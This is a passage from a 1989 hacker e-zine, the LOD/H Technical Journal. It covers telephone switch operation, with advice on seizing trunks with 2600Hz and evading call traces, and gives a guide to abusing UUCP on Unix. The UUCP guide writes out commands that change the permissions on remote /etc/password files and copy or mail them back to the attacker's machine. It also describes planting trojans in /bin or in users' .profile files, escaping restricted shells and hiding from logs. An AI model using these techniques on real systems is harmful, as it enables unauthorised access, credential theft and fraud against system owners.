At the end of this article you will find a list of the most frequently
seen Maintenance channel output messages and a brief description of their
meaning. You will also find a list of frequently used input messages.
There are other channels as well as back ups but the only ones to be
concerned with are Recent Change and SCC maint. These are the two channels
you will most likely want to get access to. The Maintenance channel doesn't
leave the C.O. and is used by switch engineers as the primary way of
controlling the switch. During off hours and weekends the control of the
switch is transferred to the SCC.
The SCC is a centrally located bureau that has up to 16 switches
reporting to it via their SCC maint. channel. The SCC has a mini computer
running SCCS that watches the output of all these switches for trouble
conditions that require immediate attention. The SCC personnel then have the
ability to input messages to that particular switch to try and correct the
problem. If necessary, someone will be dispatched to the C.O. to correct the
problem. I should also mention that the SCC mini, SCCS has dialups and access
to SCCS means access to all the switches connected to it. The level of access
however, may be dependent upon the privileges of the account you are using.
The Recent Change channels also connect to a centrally located bureau
referred to as the RCMAC. These bureaus are responsible for activating lines,
changing class of service etc. RCMAC has been automated to a large degree by
computer systems that log into COSMOS and look for pending orders. COSMOS is
basically an order placement and record keeping system for central office
equipment, but you should know that already, right? So this system, called
Work Manager running MIZAR logs into COSMOS, pulls orders requiring recent
change work, then in one batch several times a day, transmits the orders to
the appropriate switch via it's Recent Change Channel.
Testing of the switch is done by many different methods. Bell Labs has
developed a number of systems, many accomplishing the same functions. I will
only attempt to cover the ones I know fairly well.
The primary testing system is the trunk test panels located at the switch
itself. There are three and they all pretty much do the same thing, which is
to test trunk and line paths through the switch.
Trunk and Line Test Panel
Supplementary Trunk Test Panel
Manual Trunk Test Panel
MLT (Mechanized Loop Testing) is another popular one. This system is
often available through the LMOS data base and can give very specific
measurements of line levels and losses. The "TV Mask" is also popular giving
the user the ability to monitor lines via a call back number.
DAMT (Direct Access Mechanized Testing) is used by line repairmen to put
tone on numbers to help them find lines. This was previously done by Frame
personnel, so DAMT automated that task. DAMT can also monitor lines, but
unfortunately, the audio is scrambled in a manor that allows one only to tell
what type of signal is present on the line, or whether it is busy or not.
All of these testing systems have one thing in common: they access the
line through a "No Test Trunk". This is a switch which can drop in on a
specific path or line and connect it to the testing device. It depends on
the device connected to the trunk, but there is usually a noticeable "click"
heard on the tested line when the No Test Trunk drops in. Also the testing
devices I have mentioned here will seize the line, busying it out. This will
present problems when trying to monitor calls, as you would need to drop in
during the call. The No Test Trunk is also the method in which operator
consoles perform verifications and interrupts.
** INTEROFFICE SIGNALLING **
Calls coming into and leaving the switch are routed via trunks. The
switches select which trunk will route the call most effectively and then
retransmits the dialed number to the distant switch. There are several
different ways this is done. The two most common are Loop Signaling and CCIS,
Common Channel Interoffice Signaling. The predecessor to both of these is the
famous and almost extinct "SF Signaling". This utilized the presence of
2600hz to indicate trunks in use. If one winks 2600Hz down one of these
trunks, the distant switch would think you hung up. Remove the 2600, and you
have control of the trunk and you could then MF a number. This worked great
for years. Assuming you had dialed a toll free number to begin with, there
was no billing generated at all. The 1AESS does have a program called SIGI
that looks for any 2600 winks after the original connection of a toll call.
It then proceeds to record on AMA and output any MF digits received. For more
information on AMA see Phantom Phreaker's article entitled, Understanding
Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many
long distant carriers using signaling that can generate these messages it is
often overlooked and "SIG IRR" output messages are quite common.
Loop signaling still uses MF to transmit the called number to distant
switches, however, the polarity of the voltage on the trunk is reversed to
indicate trunk use.
CCIS sometimes referred to CCS#6 uses a separate data link sending
packets of data containing information regarding outgoing calls. The distant
switch monitors the information and connects the correct trunk to the correct
path. This is a faster and more efficient way of call processing and is being
implemented everywhere. The protocol that AT&T uses is CCS7 and is currently
being accepted as the industry standard. CCS6 and CCS7 are somewhat similar.
Interoffice trunks are multiplexed together onto one pair. The standard
is 24 channels per pair. This is called T-1 in it's analog format and D-1
in its digital format. This is often referred to as carrier or CXR. The terms
frame error and phase jitter are part of this technology which is often a
world in itself. This type of transmission is effective for only a few miles
on twisted pair. It is often common to see interoffice repeaters in manholes
or special huts. Repeaters can also be found within C.O.s, amplifying trunks
between offices. This equipment is usually handled by the "carrier" room,
often located on another floor. Carrier also handles special circuits, private
lines, and foreign exchange circuits.
After a call reaches a Toll Switch, the transmit and receive paths of
the calling and called party are separated and transmitted on separate
channels. This allows better transmission results and allows more calls to
be placed on any given trunk. This is referred to as 4 wire switching. This
also explains why during a call, one person can hear crosstalk and the other
cannot. Crosstalk will bleed over from other channels onto the multiplexed
T-Carrier transmission lines used between switches.
** CALL TRACING
So with the Loop Signaling standard format there is no information being
transmitted regarding the calling number between switches. This therefore
causes the call tracing routine to be at least a two step process. This is
assuming that you are trying to trace an anticipated call, not one in
progress. When call trace "CLID" is placed on a number, a message is output
every time someone calls that number. The message shows up on most of the ESS
output channels and gives information regarding the time and the number of the
incoming trunk group. If the call came from within that office, then the
calling number is printed in the message. Once the trunk group is known, it
can usually be determined what C.O. the calls are coming from. This is also
assuming that the calls are coming from within that Bell company and not
through a long distance carrier (IEC). So if Bell knows what C.O. the calls
are coming from, they simply put the called number on the C.I. list of that
C.O. Anytime anyone in that C.O. calls the number in question another message
is generated showing all the pertinent information.
Now if this were a real time trace it would only require the assistance
of the SCC and a few commands sent to the appropriate switches (i.e.
NET-LINE). This would give them the path and trunk group numbers of the call
in progress. Naturally the more things the call is going through, the more
people that will need to be involved in the trace. There seems to be a common
misconception about the ability to trace a call through some of the larger
packet networks i.e. Telenet and TYMNET. Well I can assure you, they can
track a call through their network in seconds (assuming multiple systems
and/or network gateways are not used) and then all that is needed is the
cooperation of the Bell companies. Call tracing in itself it not that
difficult these days. What is difficult is getting the different organizations
together to cooperate. You have to be doing something relatively serious to
warrant tracing in most cases, however, not always. So if tracing is a
concern, I would recommend using as many different companies at one time as
you think is necessary, especially US Sprint, since they can't even bill
people on time much less trace a call. But...it is not recommended to call
Sprint direct, more on that in the Equal Access section.
** EQUAL ACCESS
The first thing you need to understand is that every IEC Inter Exchange
Carrier (long distance company) needs to have an agreement with every LEC
Local Exchange Carrier (your local phone company) that they want to have
access to and from. They have to pay the LEC for the type of service they
receive and the amount of trunks, and trunk use. The cost is high and the
market is a zoo. The LECs have the following options:
- Feature Group A -
This was the first access form offered to the IECs by the LECs. Basically
whenever you access an IEC by dialing a regular 7 digit number (POTS line)
this is FGA. The IECs' equipment would answer the line and interpret your
digits and route your call over their own network. Then they would pick up an
outgoing telephone line in the city you were calling and dial your number
locally. Basically a dial in, dial out situation similar to Telenet's
PC pursuit service.
- Feature Group B -
FGB is 950-xxxx. This is a very different setup from FGA. When you dial
950, your local switch routes the call to the closest Access Tandem (AT) (Toll
Switch) in your area. There the IECs have direct trunks connected between the
AT and their equipment. These trunks usually use a form of multiplexing like
T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in
from the IEC are basically connected the same way. The IEC MFs into the AT
and the AT then connects the calls. There are many different ways FGB is
technically setup, but this is the most common.
Tracing on 950 calls has been an area of controversy and I would like to
clear it up. The answer is yes, it is possible. But like I mentioned earlier,
it would take considerable manpower which equals expensive to do this. It
also really depends on how the IEC interface is set up. Many IECs have
trunks going directly to Class 5 end offices. So, if you are using a small
IEC, and they figure out what C.O. you are calling from, it wouldn't be out
of the question to put CLID on the 950 number. This is highly unlikely and I
have not heard from reliable sources of it ever being done. Remember, CLID
generates a message every time a call is placed to that number. Excessive
call trace messages can crash a switch. However, I should mention that brute
force hacking of 950s is easily detected and relatively easy to trace. If the
IEC is really having a problem in a particular area they will pursue it.
- Feature Group C -
FGC is reserved for and used exclusively by AT&T.
- Feature Group D -
FGD is similar to FGB with the exception that ANI is MF'ed to the IEC.
The end office switch must have Equal Access capability in order to transmit
the ANI. Anything above a X-bar can have it. FGD can only be implemented on
800 numbers and if an IEC wants it, they have to buy the whole prefix. For a
list of FGD prefixes see 2600 Magazine. You should also be aware that MCI,
Sprint, and AT&T are offering a service where they will transmit the ANI to
the customer as well. You will find this being used as a security or
marketing tool by an increasing amount of companies. A good example would be
800-999-CHAT.
The following is a compiled list of common switch messages. The list was
compiled from various reference materials that I have at my disposal.
1AESS COMMON OUTPUT MESSAGES
--------------------------------------
MSG. DESCRIPTION
----------------------------------------------------------------
** ALARM **
AR01 Office alarm
AR02 Alarm retired or transferred
AR03 Fuse blown
AR04 Unknown alarm scan point activated
AR05 Commercial power failure
AR06 Switchroom alarm via alarm grid
AR07 Power plant alarm
AR08 Alarm circuit battery loss
AR09 AMA bus fuse blown
AR10 Alarm configuration has been changed (retired,inhibited)
AR11 Power converter trouble
AR13 Carrier group alarm
AR15 Hourly report on building and power alarms
** AUTOMATIC TRUNK TEST **
AT01 Results of trunk test
** CARRIER GROUP **
CG01 Carrier group in alarm
CG03 Reason for above
** COIN PHONE **
CN02 List of pay phones with coin disposal problems
CN03 Possible Trouble
CN04 Phone taken out of restored service because of possible coin fraud
** COPY **
COPY Data copied from one address to another
** CALL TRACE **
CT01 Manually requested trace line to line, information follows
CT02 Manually requested trace line to trunk, information follows
CT03 Intraoffice call placed to a number with CLID
CT04 Interoffice call placed to a number with CLID
CT05 Call placed to number on the CI list
CT06 Contents of the CI list
CT07 ACD related trace
CT08 ACD related trace
CT09 ACD related trace
** DIGITAL CARRIER TRUNK **
DCT COUNTS Count of T carrier errors
** MEMORY DIAGNOSTICS **
DGN Memory failure in cs/ps diagnostic program
** DIGITAL CARRIER "FRAME" ERRORS **
FM01 DCT alarm activated or retired
FM02 Possible failure of entire bank not just frame
FM03 Error rate of specified digroup
FM04 Digroup out of frame more than indicated
FM05 Operation or release of the loop terminal relay
FM06 Result of digroup circuit diagnostics
FM07 Carrier group alarm status of specific group
FM08 Carrier group alarm count for digroup
FM09 Hourly report of carrier group alarms
FM10 Public switched digital capacity failure
FM11 PUC counts of carrier group errors
** MAINTENANCE **
MA02 Status requested, print out of MACII scratch pad
MA03 Hourly report of system circuits and units in trouble
MA04 Reports condition of system
MA05 Maintenance interrupt count for last hour
MA06 Scanners,network and signal distributors in trouble
MA07 Successful switch of duplicated unit (program store etc.)
MA08 Excessive error rate of named unit
MA09 Power should not be removed from named unit
MA10 OK to remove paper
MA11 Power manually removed from unit
MA12 Power restored to unit
MA13 Indicates central control active
MA15 Hourly report of # of times interrupt recovery program acted
MA17 Centrex data link power removed
MA21 Reports action taken on MAC-REX command
MA23 4 minute report, emergency action phase triggers are inhibited
** MEMORY **
MN02 List of circuits in trouble in memory
** NETWORK TROUBLE **
NT01 Network frame unable to switch off line after fault detection
NT02 Network path trouble Trunk to Line
NT03 Network path trouble Line to Line
NT04 Network path trouble Trunk to Trunk
NT06 Hourly report of network frames made busy
NT10 Network path failed to restore
** OPERATING SYSTEM STATUS **
OP:APS-0
OP:APSTATUS
OP:CHAN
OP:CISRC Source of critical alarm, automatic every 15 minutes
OP:CSSTATUS Call store status
OP:DUSTATUS Data unit status
OP:ERAPDATA Error analysis database output
OP:INHINT Hourly report of inhibited devices
OP:LIBSTAT List of active library programs
OP:OOSUNITS Units out of service
OP:PSSTATUS Program store status
** PLANT MEASUREMENTS **
PM01 Daily report
PM02 Monthly report
PM03 Response to a request for a specific section of report
PM04 Daily summary of IC/IEC irregularities
** REPORT **
REPT:ADS FUNCTION Reports that a ADS function is about to occur
REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned
REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned
REPT:ADS FUNCTION STATE CHANGE Change in state of ADS
REPT:ADS PROCEDURAL ERROR You fucked up
REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable
REPT:PROG CONT OFF-NORMAL System programs that are off or on
REPT:RC CENSUS Hourly report on recent changes
REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited)
** RECENT CHANGE **
RC18 RC message response
** REMOVE **
RMV Removed from service
** RESTORE **
RST Restored to service status
** RINGING AND TONE PLANT **
RT04 Status of monitors
** SOFTWARE AUDIT **
SA01 Call store memory audit results
SA03 Call store memory audit results
** SIGNAL IRREGULARITY **
SIG IRR Blue box detection
SIG IRR INHIBITED Detector off
SIG IRR TRAF Half hour report of traffic data
** TRAFFIC CONDITION **
TC15 Reports overall traffic condition
TL02 Reason test position test was denied
TL03 Same as above
** TRUNK NETWORK **
TN01 Trunk diagnostic found trouble
TN02 Dial tone delay alarm failure
TN04 Trunk diag request from test panel
TN05 Trunk test procedural report or denials
TN06 Trunk state change
TN07 Response to a trunk type and status request
TN08 Failed incoming or outgoing call
TN09 Network relay failures
TN10 Response to TRK-LIST input, usually a request from test position
TN11 Hourly, status of trunk undergoing tests
TN16 Daily summary of precut trunk groups
** TRAFFIC OVERLOAD CONDITION **
TOC01 Serious traffic condition
TOC02 Reports status of less serious overload conditions
** TRANSLATION ** (shows class of service, calling features etc.)
TR01 Translation information, response to VFY-DN
TR03 Translation information, response to VFY-LEN
TR75 Translation information, response to VF:DNSVY
** **
TW02 Dump of octal contents of memory
1AESS COMMON INPUT MESSAGES
-------------------------------------
Messages always terminate with ". ctrl d " x=number or trunk network #
MSG. DESCRIPTION
------------------------------------------------------------------------
NET-LINE-xxxxxxx0000 Trace of path through switch
NET-TNN-xxxxxx Same as above for trunk trace
T-DN-MBxxxxxxx Makes a # busy
TR-DEACTT-26xxxxxxx Deactivates call forwarding
VFY-DNxxxxxxx Displays class of service, calling features etc.
VFY-LENxxxxxxxx Same as above for OE
VFY-LIST-09 xxxxxxx Displays speed calling 8 list
- ***********************************************************************
There are many things I didn't cover in this article and many of the
things I covered, I did so very briefly. My intention was to write an article
that explains the big picture, how everything fits together. I hope I helped.
Special thanks to all the stupid people, for without them some of us
wouldn't be so smart and might have to work for a living. Also all the usual
Bell Labs, AT&T bla bla bla etc. etc.
I can usually be reached on any respectable board, ha!
Agent Steal Inner (C)ircle 1989
!!!!!
!!!!! FREE KEVIN MITNICK !!!!!
!!!!!
[End Of Article]
The LOD/H Technical Journal, Issue #4: File 05 of 10
=====================================================
|| ||
|| A Hacker's Guide to UUCP ||
|| ||
|| by ||
|| ||
|| The Mentor ||
|| ||
|| Legion of Doom/Hackers ||
|| ||
|| 08/04/89 ||
|| ||
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
Scope
DDDDD
Part I of this file is intended for the casual hacker- someone
familiar with UNIX commands, but who hasn't had extended experience
with the UUCP network. Part II will be intended for the advanced
hacker who has the confidence and knowledge to go out and modify
a UNIX network- the logs, the paths, the permissions, etc...
Introduction
DDDDDDDDDDDD
Like it or not, UNIX is the most popular operating system in the
world. As a hacker, you are likely to run into several hundred
UNIX machines over the course of your hacking career. Knowing how
to move around and use the UNIX environment should be considered
absolutely essential, especially since UNIX is the operating system
of choice among phone company computers.
This article is not an attempt to teach you how to use UNIX.
If you don't know what a '$ls -x > dir' does, you need to put this
article in your archives, get a good basic file on UNIX (or buy a
book on it- there are several good ones out ((see the Bibliography
at the end of this file for suggestions))), read it, and then play
around some in a UNIX machine. Please! If you have managed to
stumble into a Bell system, do *not* use it as a machine to learn
UNIX on! You *will* get noticed by security, and this will lead
not only to the security being tightened, but may well lead to Bell
Security going through your underwear drawer.
The information in this article is mainly concerning AT&T System
V UNIX. I have included BSD 4.3 & Xenix information also in cases
that I was able to determine alternate procedures. All information
has been thoroughly tested and researched on as many machines as
possible. Standard disclaimer, your system may be slightly
different.
Glossary & Usage
DDDDDDDDDDDDDDDD
BNU - Basic Networking Utilities. System V.3's uucp package.
daemon - A program running in the background.
LAN - Local Area Network.
network - A group of machines set up to exchange information and/or
resources.
node - A terminating machine on a network.
UUCP - When capitalized, refers to the UNIX networking utilities
package.
uucp - In lower case, refers to the program Unix-to-Unix-CoPy.
I. General Information
DDDDDDDDDDDDDDDDDDD
A. What is UUCP?
UUCP is a networking facility for the UNIX operating system.
It is made up of a number of different programs that allow UNIX
machines to talk to each other. Using UUCP, you can access a
remote machine to copy files, execute commands, use resources, or
send mail. You can dial out to other non-UNIX computers, and you
can access public mail/news networks such as USENET.
B. History of UUCP
The first UUCP system was built in 1976 by Mike Lest at AT&T
Bell Labs. This system became so popular that a second version was
developed by Lesk, David Nowitz, and Greg Chesson. Version 2 UUCP
was distributed with UNIX Version 7.
With System V Release 3, a new version of UUCP that was
developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E.
Redman. This version is known as either HoneyDanBer UUCP (from the
last names of the developers), or more conventionally as Basic
Networking Utilities (BNU). I will stick with BNU, as it is easier
to type. BNU is backward compatible with Version 2, so there is
no problem communicating between the two.
BSD 4.3's UUCP release incorporates some of the BNU features,
but retains more similarity to Version 2 UUCP.
If you are unsure about which version of UUCP is on the system
that you are in, do a directory of /usr/lib/uucp and look at the
files. If you have a file called L.sys, you are in a Version 2
system. If there is a file called Systems, then it's BNU. See
Table 1 for a fairly complete listing of what system runs what UUCP
version.
Table 1*
DDDDDDD
Manufacturer Model UNIX/UUCP Version
_____________________________________________________________
| | | |
| Apollo | 3000 Series (Domain) | BSD 4.2/Version 2|
| Altos | All models | Xenix/Version 2 |
| AT&T | 3B1 (UNIX PC) | System V.2/Vers.2|
| AT&T | 3B2 | System V.3/BNU |
| AT&T | 3B15 | System V.3/BNU |
| Convergent | Miniframe (CTIX) | System V.2/Vers.2|
| Technologies | Mightframe (CTIX) | System V.3/BNU |
| DEC | MicroVAX | Ultrix/Vers. 2 + |
| DEC | VAX | BSD 4.3/Vers. 2 +|
| Encore | Multimax | System V.3/BNU |
| IBM | PC-RT (AIX) | System V.2/Vers.2|
| Masscomp | MC-5000 Series | System V.3/BNU |
| Microport | PC/AT | System V.2/Vers.2|
| NCR | Tower 32/16 | System V.2/Vers.2|
| Prime | EXL Series | System V.2/Vers.2|
| Pyramid | 90x | BSD 4.2/Version 2|
| SCO/Xenix | PC/XT | System V.2/Vers.2|
| Unisys | 5000 & 7000 Series | System V.2/Vers.2|
| | | |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
- This table is slightly outdated. Some of the systems may have
upgraded since this article was written.
II. UUCP Communications
DDDDDDDDDDDDDDDDDDD
A. Overview of UUCP User Programs
There are a number of programs that are used by a UUCP
communication network. Some are standard UNIX programs, others are
exclusively part of the UUCP package.
.................................................................
These three are standard UNIX commands:
mail- UNIX's mail facility can be used to send messages
to other systems on a UUCP network.
cu- Connects you to a remote machine and allows you to
be logged in simultaneously to both machines. Also
allows you execute commands on either machine
without dropping the link.
tip- (BSD) same as cu.
+++
There are five main programs within UUCP:
uucp- Does all the setup for a remote file transfer.
uucp creates files that describe the file transfer
(called 'work' files), then calls the uucico daemon
to do the actual work.
uux- Used to execute commands on a remote machine. uux
performs similar to uucp, except that commands are
processed instead of files.
uuname- Used to list the names of other systems that are
connected to your network.
uulog- Displays the uucp log for the specified machine.
I'll be showing how to cover your uucp tracks from
this later in the article.
uustat- Gets the status of uux requests. Also lets you
manipulate the contents of a UUCP queue.
+++
System V also has two additional programs:
uuto- Allows you to send files to another user similar
to the UNIX mail command.
uupick- Allows you to read files sent to you with uuto.
+++
BSD 4.3 has two additional programs:
uuq- Lets you view & manipulate UUCP jobs that are
waiting to be processed, similar to System V's
uupick program.
uusend- Lets you forward files through a string of systems.
..................................................................
III. Using the Programs
DDDDDDDDDDDDDDDDDD
A. uuname
This one is easy & friendly. All you do is type '$uuname'.
It will spit out a list of all systems on your network. If you
aren't sure about the name of your local system, invoke uuname with
the -l option. ($uuname -l).
B. mail
I'm not going to say to much about mail, as it isn't a program
that you will use much as a hacker except possibly to break out of
a shell. Sending mail to other people is not a good way to stay
hidden, as all mail transfer to remote systems is logged (no, they
may not read the mail, but they're likely to notice that the
unassigned ADMIN account is suddenly getting mail from all over the
world...) These logs can be modified, however. This will
be covered in Part II.
Briefly, mail is invoked with the command 'mail username' (or
mailx under some systems). If you wish to send mail to user john
on the system you're on, you would type:
mail john
Dear John-
This is mail. Enjoy it.
^D (usage note, this means control-D)
To send mail to a user on a remote system, or a string of
systems, you would use the ! key to indicate a remote system name.
If you were on node Alpha and wanted to send mail to john on node
Beta, you would address your mail to 'mail Beta!john'. If you
wanted to send mail to a user on system that's not connected to
yours, but *is* connected to a machine you are connected to, you
would string together the system names, separated by a !. For
example, if node Saturn was connected to Beta, but not to Alpha,
you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'.
Please note- If you are running the C-Shell or Bourne Shell,
you will have to prefix the ! with a X. i.e. 'mail BetaX!SaturnX!susan'.
Also, the mail header displays the system name, return path, and account
name that you send mail from, so don't try to anonymously mail someone
a message- it won't work.
Another quick feature (this is under the 'basic unix
knowledge' category), if you want to mail a file named 'message'
to someone, you'd type the following - '$mail Beta!Saturn!susan <
message'.
Finally, as mentioned above, it may be possible to break out
of a restricted shell within mail. Simply send mail to yourself,
then when you enter mail to read the message, type !sh to exit from
mail into shell. This will often blow off the restricted shell.
C. File Transfer
One of the first things that you will want to do when you
discover that you're on a network (uuname, remember?) is to grab
a copy of the /etc/password file from the systems on the net then
run Shooting Shark's password hacking program from TJ Issue #2.
Even if you have no use for it now, save it & label it, you never
know when you might need to get into that system. Besides, when
printed, they make fun & interesting wallpaper.
Unfortunately, the /etc/ directory will sometimes have access
restricted. You can get around this by copying the /etc/password
file to the /usr/spool/uucppublic directory using the uux command
(see below). If the uux program has restrictions on in, then you
may have to actually hack into the remote system using the rlogin
command. Be persistent.
UUCP is also useful in that it allows you to send a file from
your system to a remote system. Got a nice little trojan you need
to insert on their system? Use UUCP to drop it into the /bin/
directory. Or if they protected the /bin/ directory (likely, if
they have half a brain), they might have forgotten to protect all
of the users private directories (i.e. /usr/mike or /usr/susan or
sometimes even /usr/admin). UUCP a copy of a .profile file to your
system, insert your own stuff in it, then UUCP it back to its
original directory where the user will access it the next time he
logs in. People rarely $cat their .profile file, so you can
usually get away with murder in them.
While uucp has some limitations, it has the advantage of being
present on every UUCP system in the world. If you're on a System
V, you will probably use uuto & uupick much more frequently, as
it's easier to do subtle hacks with them. But if uucp is all you
have, remember, you're a hacker. Show some ingenuity. The syntax
of uucp when sending a file is:
$uucp [options] <local source> <remote destination>
For example, you have a program sitting in your working
directory on node Alpha called 'stuff', and you want to plop it
into the /usr/spool/uucppublic/mike/ directory of node Beta. The
command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'.
(Don't forget to add a slash in front of the exclamation point if
you're in C-Shell or Bourne!) A good thing to know that will save
you some typing is that the /usr/spool/uucppublic/ directory can
be abbreviated as D/ (in KSH only), so that the above command could look
like '$uucp stuff Beta!D/mike/'. You can also specify a path other than
D/. If you wish to drop your 'new & improved' version of the
/etc/password file into the /etc/ directory, you could do a '$uucp
password Beta!/etc/'. Just don't be surprised if it gets bounced
with a message similar to the following:
From uucp Sat Dec 24 23:13:15 1988
Received: by Beta.UUCP (2.15/3.3)
id AA25032; Sat Dec 24 23:13:15 edt
Date: Sat Dec 24 23:13:15 edt
From: uucp
Apparently to: hacker
Status: R
file /etc/password, system Beta
remote access to path/file denied
Another hacker-friendly feature of UUCP is the ability to copy
something into a remote user's login directory by entering a D
character before the username. For example, to dump a modified
.profile file into a user on Beta named alex, you would do the
following:
'$uucp .profile Beta!Dalex'
The syntax for uucp when receiving a remote file is:
$uucp [options] <remote path> <local directory>
For example, you wish to grab Beta's password file and put it in
a subdirectory called tmp in the account 'hacker' on node Alpha.
The command would be:
'$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'.
The same things concerning use of tildes (D) demonstrated in
sending files applies when receiving them. The following table
contains valid options to the uucp command.
Table 2
DDDDDDD
_________________________________________________
| |
| -C Copy the local source file to the spool |
| directory before attempting the trans- |
| fer. |
| |
| -f If the directory doesn't exist, abort the |
| transfer. Normally uucp will create any |
| non-existent directories, which is bad |
| technique if you're a good hacker... |
| |
| -j Display the UUCP job request number. This |
| is useful if you're going to use uustat |
| to manipulate & reroute UUCP requests in |
| the queue. |
| |
| -m Notify sender by mail when copy is done. |
| Potentially hazardous, as incoming mail |
| is logged. Later on I'll show how to |
| modify that log... |
| |
| -n<username> Notify the user specified on |
| the remote system when the xfer is done. |
| I assume everyone sees how foolish this |
| would be, right? |
| |
| -r Queue the job, but do not contact remote |
| system immediately. Can't see any pros |
| or cons in using this one... |
| |
| -s<filename> Pipe the UUCP status messages |
| to filename. Useful if you wish to log |
| off & then check the progress later. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
D. Executing Remote Commands
The uux program allows users to execute a program on another
system on the network. While in theory this is the most useful
command a hacker can use, in practice it is usually heavily
restricted- any system administrator with half a brain realizes
that letting people execute any command they like from across the
country is not the way to maintain system integrity.
There are, however, some useful things that can be done with
uux even if the sysadmin has protected the things that *he* thinks
are dangerous (remember, he's not a hacker, you are. You are
smarter, more persistent, and much cleverer than he is. He doesn't
like coming to work every day, can't wait to leave, and will do the
minimum possible to get by. You're different. You're dedicated &
tricky. You *like* what you're doing. If you don't, get the hell
out & let others who do take over. End of the pep talk.)
The format for the uux command is:
$uux [options] command-string.
See Table 3 below for a list of options.
Ok, ideal case. The System manager of Beta is an idiot who
has left all possible commands open, and the uucico daemon has root
privs. Let's say you want to alter the protection of the password
file, copy it into the D/ (public, remember?) directory, then copy
it over to your system. The sequence of commands would be:
$uux Beta!chmod 777 /etc/password
$uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt
$uucp Beta!D/info.txt /usr/hacker/
The first line would modify the protection where anyone could
get to it, the second line would copy it into the D/ directory, and
the third line would send it along to you.
Unfortunately, most commands are disabled (useful ones like
chmod and cat and ls, at least.) But sometimes you can get around
that. For instance, often you might not be able to ls or cp the
password file. But very rarely will mail be disabled. So if you
wanted a copy of the password file, you have them mail you one:
$uux Beta!mail Alpha!hacker < /etc/password
Later in the UUCP Administration section, I'll explain how to
modify the remote system so any command you want is executable.
When you execute a remote command, UUCP will automatically
send you mail telling you how it went. It's a good idea to check
the logs and see if there's anything you need to remove to cover
your presence (this subject will be covered in Part II).
If you are executing a command that is going to need data from
a file, you specify that the file is on your local system by
prefacing it with a X!. I can't think of many reasons to use this,
but perhaps you can. As an example, let's say you wanted to print
a file in your directory called 'stuff' out on a remote laser
printer (bad hacking practice, and difficult to retrieve.) Do this:
$uux Beta!lp -dlaser X!stuff
If the command you want to execute (whodo in this example) is
forbidden, you will get a notification message similar to the
following:
>From uucp Sat Dec 24 23:12:15 EDT 1988
>From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta
Status: R0
uuxqt cmd (whodo) status (DENIED)
If you are going to need the standard output for a command,
pipe it into D/. And any files or processes created by uux will
belong to the user uucp, not to you.
Table 3
DDDDDDD
__________________________________________________________
| |
| -a<username> Notify user username when completed. |
| |
| -b Print the Standard Input when the exit status |
| indicates an error. |
| |
| -c Do not copy files to the spool directory (I |
| recommend this one...too big a chance of someone |
| glancing in the spool dir. |
| |
| -g<char or num> Sets the priority of the transfer. |
| The lower alphabetically or numerically that |
| the char or num is, the faster the process will |
| be executed. i.e. -ga or -g2 will go faster |
| than -gr or -g8. |
| |
| -j Print the UUCP job number. Useful if you're |
| going to be playing with the queue. |
| |
| -I (BSD Only) Make a link from the original file to |
| the spool dir. I'm not sure what this is for. |
| |
| -L (BSD Only) Start up the uucico daemon. |
| |
| -n Don't notify by mail. Recommended if you don't |
| have the authority or knowledge to modify the |
| system mail logs. |
| |
| -p Use Standard Input |
| |
| -r Queue the job but don't start uucico. |
| |
| -s<filename> Send transfer status to file filename. |
| |
| -x<0..9> Set level of debugging information. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
E. uustat & uulog
These two programs are used to track UUCP jobs and examine
their status.
uustat prints out a one-line summary for each job, telling you
if the job is finished or the job is queued. Older versions of
uustat will have the job state as either JOB DELETED or JOB IS
QUEUED. The output of uustat will look like the following:
$uustat
1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED
1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED
| | | | | |
| | | | | |
job # user node start-time status-time job-status
See Table 4 for a list of options for the uustat command.
uulog is a more thorough version of uustat, as it tracks the
status messages logged by the system as your job proceeded through
the system. See Table 5 for options of the uulog command.
Table 4*
DDDDDDD
_________________________________________________
| |
| -a report all queued jobs. |
| |
| -k<job#> kill job # job#. |
| |
| -m report if another system is accessible. |
| |
| -q report the number of jobs queued for |
| all systems on the net. |
| |
| -s<system> report the status of jobs for |
| the system named systemname. |
| |
| -u<username> report the status of jobs for |
| user username. |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
* There are several other options such as -o and
-y that are system specific, and aren't really
that useful to begin with.
Table 5
DDDDDDD
______________________________
| |
| -s<system> same as uustat |
| |
| -u<userid> same as uustat |
| |
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
- *****************************************************************
This marks the end of Part I. If time permits a Part II will be in
the next LOD/H Technical Journal.
(c) 1989 The Mentor
Legion of Doom/Legion of Hackers
- *****************************************************************
The LOD/H Technical Journal, Issue #4: File 06 of 10.
The History of LOD/H
Revision #3 May 1990
written by Lex Luthor
NOTES: I approximated all dates, as my records are not totally complete.
If I left anyone out or put someone in that shouldn't be in, sorry I
tried and did spend considerable time researching the dates and
BBS files, the old LOD BBS software, etc. Revisions one and two were
released to LOD/H members only. Some information may only be relevant
to those who were around at the time.
The primary purpose of this article is simply to present an accurate
picture of events and people who have been associated with this group. The
reputation of many groups and many people have been tainted by slanderous
remarks made by uninformed law enforcement and justice department personnel,
the media, and other hackers. I find this sad, but it's a fact of life that
must be endured. All that can be done in this article is to attempt to present
the facts as I see them. Due to the wild and unfounded accusations by said
persons, today LOD is viewed more as malicious criminals than as for what it
was viewed as in the past. That is, of a group of people who put themselves at
risk to help inform others. Of course this is a prettier picture than most
want to believe, and is slightly prettier than what it is in actuality, but
